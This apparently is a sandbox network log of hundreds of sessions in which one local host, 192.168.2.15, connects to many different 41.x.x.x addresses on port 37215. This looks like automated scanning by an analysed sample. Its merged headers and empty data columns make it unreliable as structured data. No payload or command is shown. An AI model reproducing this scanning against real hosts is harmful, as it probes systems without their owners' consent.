                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13130192.168.2.155237441.132.252.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13131192.168.2.155261641.185.92.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13132192.168.2.154559841.48.112.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13133192.168.2.154816641.190.1.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13134192.168.2.153529641.200.66.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13135192.168.2.155989041.145.182.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13136192.168.2.153440841.131.249.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13137192.168.2.153785641.12.57.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13138192.168.2.153608241.53.29.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13139192.168.2.154007041.44.77.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13140192.168.2.154682241.199.235.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13141192.168.2.156083641.85.1.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13142192.168.2.155291641.132.8.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13143192.168.2.155276041.9.1.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13144192.168.2.156023641.14.34.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13145192.168.2.156095641.212.144.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13146192.168.2.155071841.162.101.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13147192.168.2.155298041.202.220.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13148192.168.2.153625041.179.127.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13149192.168.2.154640041.37.184.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13150192.168.2.154242041.60.254.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13151192.168.2.154592441.109.105.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13152192.168.2.155663641.140.140.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13153192.168.2.153597241.18.2.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13154192.168.2.153933841.105.143.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13155192.168.2.154595641.110.142.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13156192.168.2.155492841.76.158.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13157192.168.2.153585041.215.8.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13158192.168.2.154419641.83.222.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13159192.168.2.155085041.176.140.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13160192.168.2.155281041.168.186.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13161192.168.2.153397441.51.173.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13162192.168.2.154599641.203.193.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13163192.168.2.153899641.156.34.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13164192.168.2.153995641.33.205.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13165192.168.2.153602841.127.242.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13166192.168.2.153772641.97.44.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13167192.168.2.154193241.22.135.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13168192.168.2.154040641.188.162.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13169192.168.2.155507241.33.194.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13170192.168.2.154215241.69.93.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13171192.168.2.155966441.115.187.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13172192.168.2.154409441.96.220.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13173192.168.2.155936041.42.55.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13174192.168.2.155710841.107.57.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13175192.168.2.153521241.189.6.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13176192.168.2.155472641.70.126.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13177192.168.2.155145441.169.116.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13178192.168.2.153292241.86.45.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13179192.168.2.155923441.3.243.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13180192.168.2.153873041.125.83.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13181192.168.2.154245241.75.195.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13182192.168.2.155944641.104.187.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13183192.168.2.154612441.176.140.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13184192.168.2.153895241.179.137.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13185192.168.2.155247041.225.208.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13186192.168.2.153708841.176.120.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13187192.168.2.155373441.186.58.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13188192.168.2.155351841.37.50.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13189192.168.2.154205641.63.101.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13190192.168.2.154690841.222.59.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13191192.168.2.155517641.242.75.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13192192.168.2.155293241.66.241.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13193192.168.2.154151041.148.94.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13194192.168.2.153820841.119.15.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13195192.168.2.155207441.78.46.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13196192.168.2.153647441.94.105.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13197192.168.2.154576641.88.168.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13198192.168.2.154639841.123.249.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13199192.168.2.155333241.213.3.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13200192.168.2.155902441.109.54.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13201192.168.2.155621241.80.29.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13202192.168.2.154696841.226.248.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13203192.168.2.154529641.114.177.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13204192.168.2.155719641.94.2.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13205192.168.2.154162841.132.165.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13206192.168.2.155548841.61.234.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13207192.168.2.154346241.220.123.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13208192.168.2.153868041.152.169.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13209192.168.2.154609641.188.129.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13210192.168.2.155994841.159.174.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13211192.168.2.153493441.16.247.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13212192.168.2.154959841.139.111.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13213192.168.2.154134241.162.215.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13214192.168.2.155819641.21.124.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13215192.168.2.156061641.94.145.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13216192.168.2.155310841.139.216.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13217192.168.2.154633641.182.31.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13218192.168.2.155403641.53.116.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13219192.168.2.155931641.37.244.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13220192.168.2.154377841.102.112.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13221192.168.2.153878041.65.133.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13222192.168.2.155738241.189.229.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13223192.168.2.154466841.108.88.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13224192.168.2.154017841.150.22.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13225192.168.2.154724441.10.1.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13226192.168.2.155374441.225.68.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13227192.168.2.154801841.196.97.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13228192.168.2.154018841.209.163.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13229192.168.2.155819841.174.24.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13230192.168.2.153356641.133.218.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13231192.168.2.155520441.28.62.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13232192.168.2.153465041.88.193.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13233192.168.2.155937041.43.240.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13234192.168.2.153927841.49.230.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13235192.168.2.155451241.117.227.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13236192.168.2.154289241.209.75.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13237192.168.2.155071441.34.161.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13238192.168.2.155684241.110.145.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13239192.168.2.154492241.95.240.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13240192.168.2.155006841.156.48.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13241192.168.2.155128641.65.60.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13242192.168.2.155619241.240.66.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13243192.168.2.153541641.37.168.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13244192.168.2.154136041.188.94.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13245192.168.2.154885041.215.21.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13246192.168.2.153403241.175.200.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13247192.168.2.154608441.52.118.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13248192.168.2.156098241.200.94.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13249192.168.2.154116041.169.110.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13250192.168.2.153284841.158.52.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13251192.168.2.154485441.7.159.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13252192.168.2.154212641.60.154.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13253192.168.2.154421041.178.63.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13254192.168.2.154884041.154.5.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13255192.168.2.156018441.254.115.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13256192.168.2.153875241.156.190.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13257192.168.2.154955641.27.183.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13258192.168.2.155336041.47.199.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13259192.168.2.155315641.201.218.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13260192.168.2.154032241.119.23.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13261192.168.2.154580041.28.216.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13262192.168.2.153940641.131.54.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13263192.168.2.154919041.138.1.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13264192.168.2.155945241.93.190.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13265192.168.2.154802041.27.163.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13266192.168.2.153533641.179.141.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13267192.168.2.153779641.212.144.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13268192.168.2.153773241.24.37.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13269192.168.2.155166441.28.241.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13270192.168.2.155488641.66.74.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13271192.168.2.155441841.62.99.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13272192.168.2.155574441.43.222.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13273192.168.2.153610041.197.215.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13274192.168.2.154785041.11.167.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13275192.168.2.154116841.242.203.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13276192.168.2.155852641.18.213.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13277192.168.2.155880441.164.142.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13278192.168.2.153827241.42.248.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13279192.168.2.154369841.107.55.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13280192.168.2.155487641.220.50.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13281192.168.2.154787041.106.152.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13282192.168.2.153713841.40.223.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13283192.168.2.153720241.104.217.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13284192.168.2.155253641.207.129.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13285192.168.2.154755441.96.55.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13286192.168.2.155727841.89.40.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13287192.168.2.154007041.199.149.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13288192.168.2.154089641.229.148.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13289192.168.2.156044841.89.14.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13290192.168.2.154858241.251.185.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13291192.168.2.154526041.88.38.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13292192.168.2.154531041.39.71.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13293192.168.2.155999441.139.75.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13294192.168.2.155316241.136.80.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13295192.168.2.155063641.216.132.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13296192.168.2.155845641.191.134.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13297192.168.2.153821841.39.222.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13298192.168.2.155902641.97.240.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13299192.168.2.153335841.119.104.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13300192.168.2.153470041.171.132.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13301192.168.2.155839641.92.181.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13302192.168.2.153793241.124.139.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13303192.168.2.153327841.212.186.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13304192.168.2.153830441.249.190.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13305192.168.2.154401041.248.104.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13306192.168.2.154152641.27.71.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13307192.168.2.155816241.85.232.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13308192.168.2.154479041.51.246.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13309192.168.2.155397441.228.163.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13310192.168.2.153431041.51.178.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13311192.168.2.156046641.86.234.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13312192.168.2.154925241.227.141.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13313192.168.2.154646241.40.59.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13314192.168.2.155670041.59.24.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13315192.168.2.154656441.4.172.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13316192.168.2.154698241.106.247.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13317192.168.2.153864641.51.44.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13318192.168.2.153417841.194.2.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13319192.168.2.155101441.47.7.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13320192.168.2.154879041.86.199.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13321192.168.2.156098641.155.46.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13322192.168.2.153944841.134.45.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13323192.168.2.154051241.253.127.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13324192.168.2.154573841.232.53.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13325192.168.2.155199241.121.222.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13326192.168.2.155905441.71.3.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13327192.168.2.153498841.99.216.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13328192.168.2.155562441.22.75.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13329192.168.2.155225041.249.123.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13330192.168.2.154549041.116.123.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13331192.168.2.154230041.123.108.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
